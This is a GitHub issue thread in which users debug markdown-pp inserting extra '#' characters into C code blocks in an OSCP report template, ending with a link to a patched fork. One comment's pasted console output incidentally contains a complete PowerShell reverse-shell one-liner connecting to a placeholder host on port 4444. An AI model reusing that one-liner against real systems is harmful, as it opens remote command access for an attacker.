### ISSUE TITLE
C syntax highlighting is broken

### ISSUE THREAD

**Issue by miguelangelnieto** [thomfre/OSCP-Exam-Report-Template#6]
Hello,

When I put some code in C like:

```c
#define _LARGEFILE64_SOURCE
#define _GNU_SOURCE
```

Markdown-pp will generate a .md like this:

```c
###define _LARGEFILE64_SOURCE
###define _GNU_SOURCE
```

And that is what appears in the final PDF.

Is there any workaround for this that doesn't involve escaping all characters for markdown-pp?

Thank you.

**Comment by miguelangelnieto** [comment]
For some reason, it also tries to interpret some code:

$ markdown-pp lab-report.mdpp -o lab-report.md
Rendering: client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',4444);stream = client.GetStream();[byte[]]bytes = 0..65535|%{0};while((i = stream.Read(bytes, 0, bytes.Length)) -ne 0){;data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(bytes,0, i);sendback = (iex data 2>&1 | Out-String );sendback2 = sendback + 'PS ' + (pwd).Path + '> ';sendbyte = ([text.encoding]::ASCII).GetBytes(sendback2);stream.Write(sendbyte,0,sendbyte.Length);stream.Flush();} ...
Rendering: _SESSION['user'] =  ...

**Comment by thomfre** [comment]
I haven't seen this issue myself. 

Just to ask the stupid question first: are you sure that you are wrapping all code in code blocks?

**Comment by miguelangelnieto** [comment]
Hi,

Yes, it is all wrapped. I run the following test:

```
cd /tmp
git clone https://github.com/thomfre/OSCP-Exam-Report-Template
cd Lab/Exercises
vi 1.1.1\ Exercise.md
```

Inside I append:

\```c
#include <something.h>
\```

Then I generate the PDF:

```
./generate-report.sh lab-report lab-report.pdf
```

The output PDF will have this:

\##include <something.h>

Markdown 3.3.4
MarkdownPP 1.5.1
pandoc 2.9.2.1 Compiled with pandoc-types 1.20, texmath 0.12.0.2, skylighting 0.8.5

**Comment by miguelangelnieto** [comment]
It actually only happens on the last step, when lab-report.mdpp is used. So, something on this template breaks the code syntax.

**Comment by miguelangelnieto** [comment]
Found the issue, is the shifting of headers what is causing the problem:

```
!INCLUDE "Lab/Parts/05-exercises.md", 1
```
That will add an extra #, also to the ones that are part of the code. It does not ignore the code blocks. So, it is a bug in markdown-pp.

**Comment by miguelangelnieto** [comment]
Ok, last comment, I promise.

Looks like there was a [pull request](https://github.com/jreese/markdown-pp/pull/81) on the original [markdown-pp](https://github.com/jreese/markdown-pp) project that was never merged. This pull requests fixes the issue INCLUDE not ignoring code blocks.

I have cloned the project, merged the pull requests and now the issue is fixed. In case you want to add a note to the README, this is the repo:

https://github.com/miguelangelnieto/markdown-pp

Well, thanks for your time! :)

**Comment by thomfre** [comment]
Thanks, added now!
